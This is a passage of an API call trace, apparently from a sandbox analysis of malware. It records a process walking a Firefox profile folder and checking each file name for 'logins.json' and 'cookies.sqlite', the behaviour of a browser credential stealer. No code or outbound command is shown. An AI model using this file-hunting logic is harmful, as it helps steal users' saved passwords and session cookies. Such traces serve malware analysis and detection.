lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.228] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.228] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.228] lstrlenW (lpString="signons.sqlite") returned 14 [0161.228] GetProcessHeap () returned 0x8e0000 [0161.228] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.228] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.228] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="signons.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" [0161.228] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.228] GetProcessHeap () returned 0x8e0000 [0161.228] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.229] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", lpSrch="logins.json") returned 0x0 [0161.229] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.229] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.229] GetProcessHeap () returned 0x8e0000 [0161.229] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.229] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="times.json", cAlternateFileName="TIMES~1.JSO")) returned 1 [0161.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.229] lstrlenW (lpString="\\") returned 1 [0161.229] GetProcessHeap () returned 0x8e0000 [0161.229] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.229] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.229] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.229] lstrlenW (lpString="times.json") returned 10 [0161.229] GetProcessHeap () returned 0x8e0000 [0161.229] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x925780 [0161.229] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.229] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="times.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" [0161.229] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.229] GetProcessHeap () returned 0x8e0000 [0161.229] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.229] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json", lpSrch="logins.json") returned 0x0 [0161.229] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json", lpSrch="cookies.sqlite") returned 0x0 [0161.229] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.229] GetProcessHeap () returned 0x8e0000 [0161.229] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.229] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps", cAlternateFileName="")) returned 1 [0161.229] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0161.229] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0161.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.229] lstrlenW (lpString="\\") returned 1 [0161.230] GetProcessHeap () returned 0x8e0000 [0161.230] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.230] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.230] lstrlenW (lpString="webapps") returned 7 [0161.230] GetProcessHeap () returned 0x8e0000 [0161.230] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925780 [0161.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.230] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.230] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.230] GetProcessHeap () returned 0x8e0000 [0161.230] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.230] lstrlenW (lpString="") returned 0 [0161.230] GetProcessHeap () returned 0x8e0000 [0161.230] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925848 [0161.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.230] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.230] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.230] lstrlenW (lpString="\\*.*") returned 4 [0161.230] GetProcessHeap () returned 0x8e0000 [0161.230] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x925910 [0161.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.230] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*" [0161.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*", lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.231] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.231] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.231] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.231] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.231] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 1 [0161.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.231] lstrlenW (lpString="\\") returned 1 [0161.231] GetProcessHeap () returned 0x8e0000 [0161.231] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x9259e0 [0161.231] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0161.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0161.231] lstrlenW (lpString="webapps.json") returned 12 [0161.231] GetProcessHeap () returned 0x8e0000 [0161.231] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x925ab0 [0161.231] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0161.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="webapps.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" [0161.231] VirtualQuery (in: lpAddress=0x9259e0, lpBuffer=0x2deff0, dwLength=0x1c | out: lpBuffer=0x2deff0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.231] GetProcessHeap () returned 0x8e0000 [0161.231] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9259e0 | out: hHeap=0x8e0000) returned 1 [0161.231] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json", lpSrch="logins.json") returned 0x0 [0161.231] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json", lpSrch="cookies.sqlite") returned 0x0 [0161.231] VirtualQuery (in: lpAddress=0x925ab0, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.231] GetProcessHeap () returned 0x8e0000 [0161.232] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ab0 | out: hHeap=0x8e0000) returned 1 [0161.232] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 0 [0161.232] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.232] VirtualQuery (in: lpAddress=0x925910, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.232] GetProcessHeap () returned 0x8e0000 [0161.232] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925910 | out: hHeap=0x8e0000) returned 1 [0161.232] VirtualQuery (in: lpAddress=0x925848, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.232] GetProcessHeap () returned 0x8e0000 [0161.232] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925848 | out: hHeap=0x8e0000) returned 1 [0161.232] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.232] GetProcessHeap () returned 0x8e0000 [0161.232] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.232] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.232] lstrlenW (lpString="\\") returned 1 [0161.232] GetProcessHeap () returned 0x8e0000 [0161.232] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.232] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.232] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.232] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.232] lstrlenW (lpString="webapps") returned 7 [0161.232] GetProcessHeap () returned 0x8e0000 [0161.232] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925780 [0161.232] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.232] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.232] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.232] GetProcessHeap () returned 0x8e0000 [0161.232] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.232] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpSrch="logins.json") returned 0x0 [0161.233] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpSrch="cookies.sqlite") returned 0x0 [0161.233] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.233] GetProcessHeap () returned 0x8e0000 [0161.233] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.233] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 1 [0161.233] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.233] lstrlenW (lpString="\\") returned 1 [0161.233] GetProcessHeap () returned 0x8e0000 [0161.233] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.233] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.233] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 